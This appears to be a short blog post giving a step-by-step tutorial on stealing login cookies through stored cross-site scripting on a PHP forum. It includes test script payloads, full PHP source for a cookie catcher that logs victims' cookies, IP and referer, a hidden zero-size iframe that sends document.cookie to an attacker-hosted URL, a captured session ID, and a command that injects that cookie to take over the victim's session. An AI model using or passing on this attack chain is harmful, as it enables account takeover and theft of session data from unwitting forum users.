XSS

Well I was testing my friends site for vulnerability and I found it was vulnerable to Cross Site Scripting. The environment I used it on was php forum. The first thing I needed to do was to see if the forum allowed user to run scripts to do this I made a new thread with the script
< script> alert("Do you work")</script>
in it. And well it worked! So the next step I made was to see if it was cookie based so in the url I put
javascript:alert(document.cookie)
and I got an alert with my cookies in it. So it's starting to look real good. So now you need a cookie catcher. It's a simple php script
<?php
$cookie = $_GET['c'];
$ip = getenv ('REMOTE_ADDR');
$date=date("j F, Y, g:i a");;
$referer=getenv ('HTTP_REFERER');
$fp = fopen('cookies.html', 'a');
fwrite($fp, 'Cookie: '.$cookie.'< br > IP: ' .$ip. '< br > Date and Time: ' .$date. '< br > Referer: '.$referer.'< br > < br > < br >');
fclose($fp);
header ("Location: http://www.*******.com");
?>
So upload your php script to a php supported webhosting site. I used t35. Now you are going to make an iframe. You are going to want it small as possible for its not seen so I set height width and boarder to 0 you also want to set the document location to the location of your cookie catcher
< iframe frameboarder=0 height=0 width=0 src=javascript:void(document.location="http://********.t35.com/cookie.php?c="+document.cookie) </iframe >

Now when a user who is logged in browses to your thread you will catch his cookies in a document called cookie.html here is what the cookies looked like that I caught from my friends site
PHPSESSID=dqecpehg45ah5431f1q12p4pd1
So now you have someones cookies what do you do? Well first make sure you are logged out of the site. So now you inject there cookies into your browser you do this by typing the following in the URL
javascript:void(document.cookie="PHPSESSID=dqecpehg45ah5431f1q12p4pd1")
Hitting enter then refresh and you should be logged in as the user.A reason why this would not work is if the cookies are IP based meaning you need to have a certain IP in order to use those cookies.

No comments:

Post a Comment